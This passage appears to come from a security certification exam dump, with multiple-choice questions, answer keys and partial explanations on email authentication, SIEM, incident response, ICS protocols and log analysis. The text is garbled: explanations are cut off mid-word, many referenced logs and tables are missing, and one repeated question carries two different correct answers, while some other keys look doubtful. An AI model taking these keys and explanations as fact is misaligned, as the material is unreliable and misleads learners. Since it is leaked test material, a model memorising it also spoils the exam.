document service. Anyone with the link can access it. Which of the following threats applies to this
situation?

A. Potential data loss to external users

B. Loss of public/private key management
C. Cloud-based authentication attack
D. Identification and authentication failures

Correct Answer: A
Explanation

Explanation/Reference:
Potential data loss to external users is a threat that applies to this situation, where the accounting
department is hosting an accounts receivable form on a public document service. Anyone with the link can
access it. Data loss is an event that results in the destruction, corruption, or unauthorized disclosure of
sensitive or confidential data. Data loss can occur due to various reasons, such as human error, hardware
failure, malware infection, or cyberattack. In this case, hosting an accounts receivable form on a public
document service exposes the data to potential data loss to external users who may access it without
authorization or maliciously modify or delete it .

QUESTION 90
A security analyst is supporting an embedded software team. Which of the following is the best
recommendation to ensure proper error handling at runtime?

A. Perform static code analysis.

B. Require application fuzzing.
C. Enforce input validation.
D. Perform a code review.
Correct Answer: C
Explanation

QUESTION 91
The steering committee for information security management annually reviews the security incident
register for the organization to look for trends and systematic issues. The steering committee wants to rank
the risks based on past incidents to improve the security program for next year. Below is the incident
register for the organization:

Which of the following should the organization consider investing in first due to the potential impact of
availability?

A. Hire a managed service provider to help with vulnerability management.

B. Build a warm site in case of system outages.
C. Invest in a failover and redundant system, as necessary.
D. Hire additional staff for the IT department to assist with vulnerability management and log review.

Correct Answer: C
Explanation

Explanation/Reference:
Investing in a failover and redundant system, as necessary, is the best solution to improve the availability
of the organiza"dents. A failover system is a backup system that automatically takes over the operation of
a primary system in case of a failure or outage. A redundant system is a duplicate system that runs
simultaneously with the primary system and provides backup functionality if needed. Investing in a failover
and redundant system can help to "ystems are always available and can handle the workload without
interruption or degradation .

QUESTION 92
A cybersecurity analyst is concerned about attacks that use advanced evasion techniques. Which of the
following would best mitigate such attacks?

A. Keeping IPS rules up to date

B. Installing a proxy server
C. Applying network segmentation
D. Updating the antivirus software

Correct Answer: A
Explanation

Explanation/Reference:
Keeping IPS rules up to date is the best way to mitigate attacks that use advanced evasion techniques. An
IPS (intrusion prevention system) is a security device that monitors network traffic and blocks or prevents
malicious activity based on predefined rules or signatures. Advanced evasion techniques are cyberattacks
that combine various evasion methods to bypass security detection and protection tools, such as IPS.
Keeping IPS rules up to date can help to ensure that the IPS can recognize and block the latest advanced
evasion techniques and prevent them from compromising the network .
Exam B

QUESTION 1
A security analyst discovers a standard user has unauthorized access to the command prompt,
PowerShell, and other system utilities. Which of the following is the BEST action for the security analyst to
take?

A. Disable the appropriate settings in the administrative template of the Group Policy.
B. Use AppLocker to create a set of whitelist and blacklist rules specific to group membership.
C. Modify the registry keys that correlate with the access settings for the System32 directory.
D. Remove the user's permissions from the various system executables.

Correct Answer: A
Explanation

QUESTION 2
An international company is implementing a marketing campaign for a new product and needs a security
analyst to perform a threat-hunting process to identify possible threat actors. Which of the following should
be the analyst's primary focus?

A. Hacktivists
B. Organized crime
C. Nation-states
D. Insider threats

Correct Answer: B
Explanation

QUESTION 3
A security engineer must deploy X 509 certificates to two web servers behind a load balancer. Each web
server is configured identically. Which of the following should be done to ensure certificate name mismatch
errors do not occur?

A. Create two certificates, each with the same fully qualified domain name, and associate each with the
web servers' real IP addresses on the load balancer.
B. Create one certificate on the load balancer and associate the site with the web servers' real IP
addresses.
C. Create two certificates, each with the same fully qualified domain name, and associate each with a
corresponding web server behind the load balancer.
D. Create one certificate and export it to each web server behind the load balancer.

Correct Answer: C
Explanation

QUESTION 4
A security analyst is reviewing existing email protection mechanisms to generate a report. The analysis
finds the following DNS records:

Record 1
v=spf1 ip4:192:168.0.0/16 include:_spf.marketing.com include: thirdpartyprovider.com ~all

Record 2
"v=DKIM1\ k=rsa\;
p=MIGfMA0GCSqh7d8hyh78Gdg87gd98hag86ga98dhay8gd7ashdca7yg79auhudig7df9ah8g76ag98dhay
87ga9"

Record 3
_dmarc.comptia.com TXT v=DMARC1\; p=reject\; pct=100; rua=mailto:[email protected]

Which of the following options provides accurate information to be included in the report?

A. Record 3 serves as a reference of the security features configured at Record 1 and 2.

B. Record 1 is used as a blocklist mechanism to filter unauthorized senders.
C. Record 2 is used as a key to encrypt all outbound messages sent.
D. The three records contain private information that should not be disclosed.

Correct Answer: A
Explanation

Explanation/Reference:
The DMARC record is what tells us to do with messages that don't properly align to SPF / DKIM.
WRONG ANSWERS
?B ?this SPF record, as configured, is a softfail. That means it functions as less of a blocklist and more as
a quarantine list.
?C ?the DKIM key is used to sign, not encrypt, outbound messages.
?D ?all 3 records must be in public DNS or e-mail servers outside the organization would be unable to
reference them and use them.

QUESTION 5
Which of the following BEST explains the function of a managerial control?

A. To scope the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system
maintenance
C. To implement data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the
implementation of audit trails

Correct Answer: C
Explanation

Explanation/Reference:
https://www.examtopics.com/discussions/comptia/view/84935-exam-cs0-002-topic-1-question-191-
discussion/

QUESTION 6
Which of the following provides an automated approach to checking a system configuration?

A. SCAP
B. CI/CD
C. OVAL
D. Scripting
E. SOAR

Correct Answer: A
Explanation

Explanation/Reference:
SCAP (Security Content Automation Protocol) is a standardized language for expressing and manipulating
security data, including system configuration information. It provides a systematic, automated approach to
checking a system configuration, making it easier to assess the security of a system and identify
vulnerabilities. SCAP enables organizations to automate the process of security configuration management
and assessment, reducing the risk of security breaches and ensuring that systems are configured
securely. By using SCAP, organizations can improve their overall security posture, as well as comply with
various regulations and industry standards.

QUESTION 7
A digital forensics investigator works from duplicate images to preserve the integrity of the original
evidence. Which of the following types of media are MOST volatile and should be preserved? (Choose
two.)

A. Memory cache
B. Registry file
C. SSD storage
D. Temporary filesystems
E. Packet decoding
F. Swap volume

Correct Answer: AD
Explanation

QUESTION 8
A security analyst discovers the company's website is vulnerable to cross-site scripting. Which of the
following solutions will BEST remedy the vulnerability?

A. Prepared statements
B. Server-side input validation
C. Client-side input encoding
D. Disabled JavaScript filtering

Correct Answer: B
Explanation

Explanation/Reference:
The BEST solution to remedy the cross-site scripting vulnerability on the company's website is option B,
server-side input validation.

Server-side input validation involves checking user input on the server side to ensure that it meets
expected criteria before it is processed or stored. This can prevent malicious code from being injected into
the website and reduce the risk of cross-site scripting attacks.

QUESTION 9
During a company's most recent incident, a vulnerability in custom software was exploited on an externally
facing server by an APT. The lessons-learned report noted the following:

The development team used a new software language that was not supported by the security team's
automated assessment tools.
During the deployment, the security assessment team was unfamiliar with the new language and struggled
to evaluate the software during advanced testing. Therefore, the vulnerability was not detected. The
current IPS did not have effective signatures and policies in place to detect and prevent runtime attacks on
the new application.

To allow this new technology to be deployed securely going forward, which of the following will BEST
address these findings? (Choose two.)

A. Train the security assessment team to evaluate the new language and verify that best practices for
secure coding have been followed
B. Work with the automated assessment-tool vendor to add support for the new language so these
vulnerabilities are discovered automatically
C. Contact the human resources department to hire new security team members who are already familiar
with the new language
D. Run the software on isolated systems so when they are compromised, the attacker cannot pivot to
adjacent systems
E. Instruct only the development team to document the remediation steps for this vulnerability
F. Outsource development and hosting of the applications in the new language to a third-party vendor so
 the risk is transferred to that provider

Correct Answer: AB
Explanation

QUESTION 10
A security team is struggling with alert fatigue, and the Chief Information Security Officer has decided to
purchase a SOAR platform to alleviate this issue. Which of the following BEST describes how a SOAR
platform will help the security team?

A. SOAR will integrate threat intelligence into the alerts, which will help the security team decide which
events should be investigated first.
B. A SOAR platform connects the SOC with the asset database, enabling the security team to make
informed decisions immediately based on asset criticality.
C. The security team will be able to use the SOAR framework to integrate the SIEM with a TAXII server,
which has an automated intelligence feed that will enhance the alert data.
D. Logic can now be created that will allow the SOAR platform to block specific traffic at the firewall
according to predefined event triggers and actions.

Correct Answer: A
Explanation

QUESTION 11
An analyst needs to forensically examine a Windows machine that was compromised by a threat actor.
Intelligence reports state this specific threat actor is characterized by hiding malicious artifacts, especially
with alternate data streams.
Based on this intelligence, which of the following BEST explains alternate data streams?

A. A different way data can be streamlined if the user wants to use less memory on a Windows system for
forking resources.
B. A way to store data on an external drive attached to a Windows machine that is not readily accessible
to users.
C. A Windows attribute that provides for forking resources and is potentially used to hide the presence of
secret or malicious files inside the file records of a benign file.
D. A Windows attribute that can be used by attackers to hide malicious files within system memory.

Correct Answer: C
Explanation

QUESTION 12
A cybersecurity analyst is working with a SIEM tool and reviewing the following table:
When creating a rule in the company's SIEM, which of the following would be the BEST approach for the
analyst to use to assess the risk level of each vulnerability that is discovered by the vulnerability
assessment tool?

A. Create a trend with the table and join the trend with the desired rule to be able to extract the risk level
of each vulnerability
B. Use Boolean filters in the SIEM rule to take advantage of real-time processing and RAM to store the
table dynamically, generate the results faster, and be able to display the table in a dashboard or export
it as a report
C. Use a static table stored on the disk of the SIEM system to correlate its data with the data ingested by
the vulnerability scanner data collector
D. Use the table as a new index or database for the SIEM to be able to use multisearch and then
summarize the results as output

Correct Answer: B
Explanation

QUESTION 13
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile
phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and
running some sort of protection against malicious software. Which of the following existing technical
controls should a security analyst recommend to BEST meet all the requirements?

A. EDR
B. Port security
C. NAC
D. Segmentation

Correct Answer: A
Explanation

Explanation/Reference:
EDR stands for endpoint detection and response, which is a type of security solution that monitors and
protects all devices that are connected to a network, such as laptops and mobile phones. EDR can help to
ensure that all devices are patched and running some sort of protection against malicious software by
providing continuous visibility, threat detection, incident response, and remediation capabilities. EDR can
also help to enforce security policies and compliance requirements across all devices .
https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/

QUESTION 14
A security analyst receives a report indicating a system was compromised due to malware that was
downloaded from the internet using TFTP. The analyst is instructed to block TFTP at the corporate firewall.
Given the following portion of the current firewall rule set:

Which of the following rules should be added to accomplish this goal?

A. UDP ANY ANY ANY 20 Deny

B. UDP ANY ANY 69 69 Deny
C. UDP ANY ANY 67 68 Deny
D. UDP ANY ANY ANY 69 Deny
E. UDP ANY ANY ANY 69 Deny

Correct Answer: D
Explanation

Explanation/Reference:
D. TFTP client should have a source port of something higher that 1024 and connect to a DST port on the
TFTP server on port 69. The TFTP server will then respond on a port higher than 1024. This is done so
there no conflicts with sessions.

QUESTION 15
A security analyst found the following entry in a server log:

The analyst executed netstat and received the following output:

Which of the following lines in the output confirms this was successfully executed by the server?
A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
G. 7

Correct Answer: E
Explanation

QUESTION 16
Which of the following weaknesses associated with common SCADA systems are the MOST critical for
organizations to address architecturally within their networks? (Choose two.)

A. Boot processes that are neither measured nor attested

B. Legacy and unpatchable systems software
C. Unnecessary open ports and protocols
D. No OS kernel mandatory access controls
E. Unauthenticated commands
F. Insecure filesystem permissions

Correct Answer: BF
Explanation

QUESTION 17
Which of the following ICS network protocols has no inherent security functions on TCP port 502?

A. CIP
B. DHCP
C. SSH
D. Modbus

Correct Answer: D
Explanation

QUESTION 18
Which of the flowing is the best reason why organizations need operational security controls?

A. To supplement areas that other controls cannot address

B. To limit physical access to areas that contain sensitive data
C. To assess compliance automatically against a secure baseline
D. To prevent disclosure by potential insider threats

Correct Answer: A
Explanation

QUESTION 19
While observing several host machines, a security analyst notices a program is overwriting data to a buffer.
Which of the following controls will best mitigate this issue?

A. Data execution prevention

B. Output encoding
C. Prepared statements
D. Parameterized queries

Correct Answer: A
Explanation

QUESTION 20
A security analyst is evaluating the following support ticket:

Issue: Marketing campaigns are being filtered by the customer's email servers.
Description: Our marketing partner cannot send emails using our email address. The following log
messages were collected from multiple customers:

1. The SPF result is PermError.

2. The SPF result is SoftFail or Fail.
3. The 550 SPF check failed.

Which of the following should the analyst do next?

A. Ask the marketing partner's ISP to disable the DKIM setting.

B. Request approval to disable DMARC on the company's ISP.
C. Ask the customers to disable SPF validation.
D. Request a configuration change on the company's public DNS.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 21
An application must pass a vulnerability assessment to move to the next gate. Consequently, any security
issues that are found must be remediated prior to the next gate. Which of the following best describes the
method for end-to-end vulnerability assessment?

A. Security regression testing

B. Static analysis
C. Dynamic analysis
D. Stress testing

Correct Answer: C
Explanation

QUESTION 22
A development team is discussing the implementation of parameterized queries to address several
software vulnerabilities. Which of the following is the most likely type of vulnerability the team is trying to
remediate?

A. SQL injection
B. CSRF
C. On-path attack
D. XSS

Correct Answer: A
Explanation

QUESTION 23
A security analyst s monitoring a company's network traffic and finds ping requests going to accounting
and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician
responded to potential network connectivity issues. Which of the following is the best way for the security
analyst to respond?

A. Report this activity as a false positive, as the activity is legitimate.

B. Isolate the system and begin a forensic investigation to determine what was compromised.
C. Recommend network segmentation to the management team as a way to secure the various
environments.
D. Implement host-bases firewalls on all systems to prevent ping sweeps in the future.

Correct Answer: A
Explanation

QUESTION 24
An organization is performing a risk assessment to prioritize resources for mitigation and remediation
based on impact. Which of the following metrics, in addition to the CVSS for each CVE, would best enable
the organization to prioritize is efforts?

A. OS type
B. OS or application versions
C. Patch availability
D. System architecture
E. Mission criticality

Correct Answer: E
Explanation

QUESTION 25
A new prototype for a company's flagship product was leaked on the internet. As a result, the management
team has locked out all USB dives. Optical drive writers are not present on company computers. The sales
team has been granted an exception to share sales presentation files with third parties. Which of the
following would allow the IT team to determine which devices are USB enabled?

A. Asset tagging
B. Device encryption
C. Data loss prevention
D. SIEM logs

Correct Answer: D
Explanation

QUESTION 26
A security officer needs to find a solution to the current data privacy and protection gap found in the last
security assessment. Which of the following is the most cost-effective solution?

A. Require users to sign NDAs.

B. Create a data minimization plan.
C. Add access control requirements.
D. Implement a data loss prevention solution.

Correct Answer: B
Explanation

QUESTION 27
A development team recently released a new version of a public-facing website for testing prior to
production. The development team is soliciting the help of various teams to validate the functionality of the
website due to its high visibility.
Which of the following activities best describes the process the development team is initiating?

A. Static analysis
B. Stress testing
C. Code review
D. User acceptance testing

Correct Answer: D
Explanation

QUESTION 28
A cybersecurity analyst is concerned about attacks that use advanced evasion techniques. Which of the
following would best mitigate such attacks?

A. Keeping IPS rules up to date

B. Installing a proxy server
C. Applying network segmentation
D. Updating the antivirus software

Correct Answer: A
Explanation

QUESTION 29
While reviewing a vulnerability assessment, an analyst notices the following issue is identified in the report:

To address this finding, which of the following would be most appropriate for the analyst to recommend to
the network engineer?

A. Reconfigure the device to support only connections leveraging TLSv1.2.

B. Obtain a new self-signed certificate and select AES as the hashing algorithm.
C. Replace the existing certificate with a certificate that uses only MDS for signing.
D. Use only signed certificates with cryptographically secure certificate sources.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 30
An analyst needs to understand how an attacker compromised a server. Which of the following procedures
will best deliver the information that is necessary to reconstruct the steps taken by the attacker?
A. Scan the affected system with an anti-malware tool and check for vulnerabilities with a vulnerability
scanner.
B. Extract the server's system timeline, verifying hashes and network connections during a certain time
frame.
C. Clone the entire system and deploy it in a network segment built for tests and investigations while
monitoring the system during a certain time frame.
D. Clone the server's hard disk and extract all the binary files, comparing hash signatures with malware
databases.

Correct Answer: B
Explanation

QUESTION 31
An organization is concerned about the security posture of vendors with access to its facilities and
systems. The organization wants to implement a vendor review process to ensure the policies
implemented by vendors are in line with its own.
Which of the following will provide the highest assurance of compliance?

A. An in-house red-team report

B. A vendor self-assessment report
C. An independent third-party audit report
D. Internal and external scans from an approved third-party vulnerability vendor

Correct Answer: C
Explanation

QUESTION 32
A manufacturing company has joined the information sharing and analysis center for its sector. As a
benefit, the company will receive structured IoC data contributed by other members. Which of the following
best describes the utility of this data?

A. Other members will have visibility into instances of positive IoC identification within the manufacturing
company's corporate network.
B. The manufacturing company will have access to relevant malware samples from all other
manufacturing sector members.
C. Other members will automatically adjust their security postures to defend the manufacturing company's
processes.
D. The manufacturing company can ingest the data and use tools to autogenerate security configurations
for all of its infrastructure.

Correct Answer: B
Explanation

QUESTION 33
A security analyst who works in the SOC receives a new requirement to monitor for indicators of
compromise. Which of the following is the first action the analyst should take in this situation?

A. Develop a dashboard to track the indicators of compromise.

B. Develop a query to search for the indicators of compromise.
C. Develop a new signature to alert on the indicators of compromise.
D. Develop a new signature to block the indicators of compromise.

Correct Answer: B
Explanation
QUESTION 34
During an incident response procedure, a security analyst acquired the needed evidence from the hard
drive of a compromised machine. Which of the following actions should the analyst perform NEXT to
ensure the data integrity of the evidence?

A. Generate hashes for each file from the hard drive.

B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.

Correct Answer: A
Explanation

QUESTION 35
An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer

B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

Correct Answer: D
Explanation

Explanation/Reference:
D. In this case, Data custodian, role would be the best fit because it includes responsibilities for protecting
data, including securing, monitoring, and controlling access to it, as well as ensuring data is accurate,
complete, and accessible when needed. Ensuring that backups are properly maintained would fall under
the responsibilities of a data custodian, as they would be responsible for protecting data and ensuring its
availability.

QUESTION 36
A security analyst discovers a standard user has unauthorized access to the command prompt,
PowerShell, and other system utilities. Which of the following is the BEST action for the security analyst to
take?

A. Disable the appropriate settings in the administrative template of the Group Policy.
B. Use AppLocker to create a set of whitelist and blacklist rules specific to group membership.
C. Modify the registry keys that correlate with the access settings for the System32 directory.
D. Remove the user's permissions from the various system executables.

Correct Answer: D
Explanation

Explanation/Reference:
Remove the user's permissions from the various system executables is the BEST action for the security
analyst to take.

QUESTION 37
After an incident involving a phishing email, a security analyst reviews the following email access log:
Based on this information, which of the following accounts was MOST likely compromised?

A. CARLB
B. CINDYP
C. GILLIANO
D. ANDREAD
E. LAURAB

Correct Answer: D
Explanation

QUESTION 38
A security analyst is revising a company's MFA policy to prohibit the use of short message service (SMS)
tokens. The Chief Information Officer has questioned this decision and asked for justification. Which of the
following should the analyst provide as justification for the new policy?

A. SMS relies on untrusted, third-party carrier networks.

B. SMS tokens are limited to eight numerical characters.
C. SMS is not supported on all handheld devices in use.
D. SMS is a cleartext protocol and does not support encryption.

Correct Answer: D
Explanation

QUESTION 39
A security analyst discovers the following firewall log entries during an incident:
Which of the following is MOST likely occurring?

A. Banner grabbing
B. Port scanning
C. Beaconing
D. Data exfiltration

Correct Answer: B
Explanation

QUESTION 40
An analyst received an alert regarding an application spawning a suspicious command shell process.
Upon further investigation, the analyst observes the following registry change occurring immediately after
the suspicious event:

Which of the following was the suspicious event able to accomplish?

A. Impair defenses.
B. Establish persistence.
C. Bypass file access controls.
D. Implement beaconing.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 41
An analyst is reviewing the following output:

Vulnerability found: Improper neutralization of script-related HTML tag

Which of the following was most likely used to discover this?

A. Reverse engineering using a debugger

B. A static analysis vulnerability scan
C. A passive vulnerability scan
D. A database vulnerability scan
Correct Answer: D
Explanation

QUESTION 42
A security analyst is reviewing the logs and notices the following entries:

Which of the following most likely occurred?

A. LDAP injection
B. Clickjacking
C. XSS
D. SQLi

Correct Answer: D
Explanation

QUESTION 43
After running the cat file01.bin | hexdump -C command, a security analyst reviews the following output
snippet:

Which of the following digital-forensics techniques is the analyst using?

A. Reviewing the file hash

B. Debugging the binary file
C. Implementing file carving
D. Verifying the file type
E. Utilizing reverse engineering

Correct Answer: D
Explanation

QUESTION 44
A security analyst recently implemented a new vulnerability scanning platform. The initial scan of 438 hosts
found the following vulnerabilities:

210 critical
1,854 high
1,786 medium
48 low

The analyst is unsure how to handle such a large-scale remediation effort. Which of the following would be
the next logical step?
A. Identify the assets with a high value and remediate all vulnerabilities on those hosts.
B. Perform remediation activities for all critical and high vulnerabilities first.
C. Perform a risk calculation to determine the probability and magnitude of exposure.
D. Identify the vulnerabilities that affect the most systems and remediate them first.

Correct Answer: B
Explanation

QUESTION 45
The SFTP server logs show thousands of failed login attempts from hundreds of IP addresses worldwide.
Which of the following controls would BEST protect the service?

A. Whitelisting authorized IP addresses

B. Blacklisting unauthorized IP addresses
C. Enforcing more complex password requirements
D. Establishing a sinkhole service

Correct Answer: A
Explanation

QUESTION 46
A security operations manager wants to build out an internal threat-hunting capability. Which of the
following should be the first priority when creating a threat-hunting program?

A. Establishing a hypothesis about which threats are targeting which systems

B. Profiling common threat actors and activities to create a list of IOCs
C. Ensuring logs are sent to a centralized location with search and filtering capabilities
D. Identifying critical assets that will be used to establish targets for threat-hunting activities

Correct Answer: C
Explanation

Explanation/Reference:
By aggregating logs in a centralized location with search and filtering capabilities, security analysts can
quickly and easily identify anomalous behavior that may indicate a potential threat. Additionally, a
centralized location makes it easier to correlate events across multiple systems and identify patterns that
may be indicative of an attack.

QUESTION 47
A Chief Information Security Officer is concerned that contract developers may be able to steal the code
used to design the company's latest application since they are able to pull code from a cloud-based
repository directly to laptops that are not owned by the company. Which of the following solutions would
best protect the company code from being stolen?

A. MDM
B. SCA
C. CASB
D. VDI

Correct Answer: D
Explanation

Explanation/Reference:
VDI provides a secure environment for accessing company resources, such as code repositories, from
remote locations. With VDI, the code repository would be accessed through a virtual desktop hosted on the
company's servers, rather than on the developer's laptop. This means that the company's IT department
can control the virtual desktop and ensure that it is secure, including installing security software, monitoring
activity, and limiting access to the code repository.

QUESTION 48
Which of the following is a reason for correctly identifying APTs that might be targeting an organization?

A. APTs' passion for social justice will make them ongoing and motivated attackers.
B. APTs utilize methods and technologies differently than other threats.
C. APTs are primarily focused on financial gain and are widely available over the internet.
D. APTs lack sophisticated methods, but their dedication makes them persistent.

Correct Answer: B
Explanation

QUESTION 49
A large company wants to address frequent outages on critical systems with a secure configurations
program. The Chief Information Security Officer (CISO) has asked the analysts to conduct research and
make recommendations for a cost- effective solution with the least amount of disruption to the business.
Which of the following would be the best way to achieve these goals?

A. Adopt the CIS security controls as a framework, apply configurations to all assets, and then notify asset
owners of the change.
B. Coordinate with asset owners to assess the impact of the CIS critical security controls, perform testing,
and then implement across the enterprise.
C. Recommend multiple security controls depending on business unit needs, and then apply
configurations according to the organization's risk tolerance.
D. Ask asset owners which configurations they would like, compile the responses, and then present all
options to the CISO for approval to implement.

Correct Answer: B
Explanation

QUESTION 50
A security operations manager wants some recommendations for improving security monitoring. The
security team currently uses past events to create an IoC list for monitoring. Which of the following is the
best suggestion for improving monitoring capabilities?

A. Update the IPS and IDS with the latest rule sets from the provider.
B. Create an automated script to update the IPS and IDS rule sets.
C. Use an automated subscription to select threat feeds for IDS.
D. Implement an automated malware solution on the IPS.

Correct Answer: C
Explanation

QUESTION 51
Which of the following is a reason to take a DevSecOps approach to a software assurance program?

A. To find and fix security vulnerabilities earlier in the development process

B. To speed up user acceptance testing in order to deliver the code to production faster
C. To separate continuous integration from continuous development in the SDLC
D. To increase the number of security-related bug fixes worked on by developers

Correct Answer: A
Explanation
QUESTION 52
A consumer credit card database was compromised, and multiple representatives are unable to review the
appropriate customer information. Which of the following should the cybersecurity analyst do first?

A. Start the containment effort.

B. Confirm the incident.
C. Notify local law enforcement officials.
D. Inform the senior management team.

Correct Answer: B
Explanation

QUESTION 53
A large company would like a security analyst to recommend a solution that will allow only company
laptops to connect to the corporate network. Which of the following technologies should the analyst
recommend?

A. UEBA
B. DLP
C. NAC
D. EDR

Correct Answer: C
Explanation

QUESTION 54
Security awareness and compliance programs are most effective at reducing the likelihood and impact of
attacks from:

A. advanced persistent threats.

B. corporate spies.
C. hacktivists.
D. insider threats.

Correct Answer: D
Explanation

QUESTION 55
A security analyst needs to recommend a solution that will allow users at a company to access cloud-
based SaaS services but also prevent them from uploading and exfiltrating data. Which of the following
solutions should the security analyst recommend?

A. CASB
B. MFA
C. VPN
D. VPS
E. DLP

Correct Answer: E
Explanation

QUESTION 56
Legacy medical equipment, which contains sensitive data, cannot be patched. Which of the following is the
best solution to improve the equipment's security posture?
A. Move the legacy systems behind a WAR
B. Implement an air gap for the legacy systems.
C. Place the legacy systems in the perimeter network.
D. Implement a VPN between the legacy systems and the local network.

Correct Answer: B
Explanation

Explanation/Reference:
Implementing an air gap for the legacy systems is the best solution to improve their security posture. An air
gap is a physical separation of a system or network from any other system or network that may pose a
threat. An air gap can prevent any unauthorized access or data transfer between the isolated system or
network and the external environment. Implementing an air gap for the legacy systems can help to protect
them from being exploited by attackers who may take advantage of their unpatched vulnerabilities .

QUESTION 57
A security analyst notices the following proxy log entries:

Which of the following is the user attempting to do based on the log entries?

A. Use a DoS attack on external hosts.

B. Exfiltrate data.
C. Scan the network.
D. Relay email.

Correct Answer: D
Explanation

Explanation/Reference:
Based on the provided log entries, the user is attempting to relay email. This can be inferred from the log
entries that show attempts to establish connections to external IP addresses on port 25, which is the
default port for SMTP (Simple Mail Transfer Protocol) used for email transmission.

QUESTION 58
A company's legal department is concerned that its incident response plan does not cover the countless
ways security incidents can occur. The department has asked a security analyst to help tailor the response
plan to provide broad coverage for many situations. Which of the following is the best way to achieve this
goal?

A. Focus on incidents that have a high chance of reputation harm.

B. Focus on common attack vectors first.
C. Focus on incidents that affect critical systems.
D. Focus on incidents that may require law enforcement support.

Correct Answer: B
Explanation
QUESTION 59
During a company's most recent incident, a vulnerability in custom software was exploited on an externally
facing server by an APT. The lessons-learned report noted the following:

1. The development team used a new software language that was not supported by the security team's
automated assessment tools.
2. During the deployment, the security assessment team was unfamiliar with the new language and
struggled to evaluate the software during advanced testing. Therefore, the vulnerability was not detected.
3. The current IPS did not have effective signatures and policies in place to detect and prevent runtime
attacks on the new application.

To allow this new technology to be deployed securely going forward, which of the following will BEST
address these findings? (Choose two.)

A. Train the security assessment team to evaluate the new language and verify that best practices for
secure coding have been followed
B. Work with the automated assessment-tool vendor to add support for the new language so these
vulnerabilities are discovered automatically
C. Contact the human resources department to hire new security team members who are already familiar
with the new language
D. Run the software on isolated systems so when they are compromised, the attacker cannot pivot to
adjacent systems
E. Instruct only the development team to document the remediation steps for this vulnerability
F. Outsource development and hosting of the applications in the new language to a third-party vendor so
the risk is transferred to that provider

Correct Answer: AB
Explanation

Explanation/Reference:
The solution will address the findings that the development team used a new software language that was
not supported by the security team's automated assessment tools and the security assessment team was
unfamiliar with the new language and struggled to evaluate the software during advanced testing. The
training of the security assessment team and working with the automated assessmenttool vendor to add
support for the new language will ensure that future deployments of the new technology are secure and the
vulnerabilities are detected and prevented.

QUESTION 60
Given the Nmap request below:
Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection

Correct Answer: C
Explanation

Explanation/Reference:
The Nmap command given in the question performs a TCP SYN scan (-sS), a service version detection
scan (-sV), an OS detection scan (-O), and a port scan for ports 1-1024 (-p 1-1024) on the host
192.168.1.1. This command will reveal information about the hos" and running services, which can be
used by an attacker to launch a brute-force attack against the host. A brute-force attack is a method of
guessing passwords or encryption keys by trying many possible combinations until finding the correct one.
An attacker can use the information from the Nmap scan to target specific services or protocols that may
have weak or default credentials, such as FTP, SSH, Telnet, or HTTP.

QUESTION 61
A security analyst is reviewing the following log entries to identify anomalous activity:
Which of the following attack types is occurring?

A. Directory traversal
B. SQL injection
C. Buffer overflow
D. Cross-site scripting

Correct Answer: A
Explanation

Explanation/Reference:
A directory traversal attack is a type of web application attack that exploits insufficient input validation or
improper configuration to access files or directories that are outside the intended scope of the web server.
The log entries given in the question show s" sequences in the URL, which indicate an attempt to move up
one level in the directory structure. For "" tries to access the /etc/passwd file, which contains user account
information on Linux systems. If successful, this attack could allow an attacker to read, modify, or execute
files on the web server that are not meant to be accessible.

QUESTION 62
A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an
endpoint device. The security analyst then identifies the following additional details:
Bursts of network utilization occur approximately every seven days. The content being transferred appears
to be encrypted or obfuscated. A separate but persistent outbound TCP connection from the host to
infrastructure in a third-party cloud is in place.
The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.
Single file sizes are 10GB.
Which of the following describes the most likely cause of the issue?

A. Memory consumption
B. Non-standard port usage
C. Data exfiltration
D. System update
E. Botnet participant

Correct Answer: C
Explanation

Explanation/Reference:
data exfiltration is the unauthorized transfer of data from an " destination, usually for malicious purposes
such as espionage, sabotage, or theft. The details given in the question suggest that data exfiltration is
occurring from an endpoint device. The bursts of network utilization every seven days indicate periodic
data transfers. The content being transferred appears to be encrypted or obfuscated to avoid detection or
analysis. The persistent outbound TCP connection from the host to infrastructure in a third-party cloud
indicates a possible command and control channel for an attacker. The HDD utilization on the device
grows by 10GB to 12GB over the course of every seven days, and single file sizes are 10GB, indicating
that large amounts of data are being collected and compressed before being exfiltrated.

QUESTION 63
A security analyst wants to capture large amounts of network data that will be analyzed at a later time. The
packet capture does not need to be in a format that is readable by humans, since it will be put into a binary
file called "packetCapture." The capture must be as efficient as possible, and the analyst wants to minimize
the likelihood that packets will be missed. Which of the following commands will best accomplish the
analyst's objectives?
A. tcpdump -w packetCapture
B. tcpdump -a packetCapture
C. tcpdump -n packetCapture
D. nmap -v > packetCapture
E. nmap -oA > packetCapture

Correct Answer: A
Explanation

Explanation/Reference:
The tcpdump command is a network packet analyzer tool that can capture and display network traffic. The
-w option specifies a file name to write the captured packets to, in a binary format that can be read by
tcpdump or other tools later. This option is useful for capturing large amounts of network data that will be
analyzed at a later time, as the question requires. The packet capture does not need to be in a format that
is readable by humans, since it will be put into a binary file called " . The capture must be as efficient as
possible, and the -w option minimizes the processing and output overhead of tcpdump, reducing the
likelihood that packets will be missed.

QUESTION 64
Which of the following ICS network protocols has no inherent security functions on TCP port 502?

A. CIP
B. DHCP
C. SSH
D. Modbus

Correct Answer: D
Explanation

Explanation/Reference:
Modbus is an industrial control system (ICS) network protocol that is used for communication between
devices such as sensors, controllers, actuators, and monitors. Modbus has no inherent security functions
on TCP port 502, which is the default port for Modbus TCP/IP communication. Modbus does not provide
any encryption, authentication, or integrity protection for the data transmitted over the network, making it
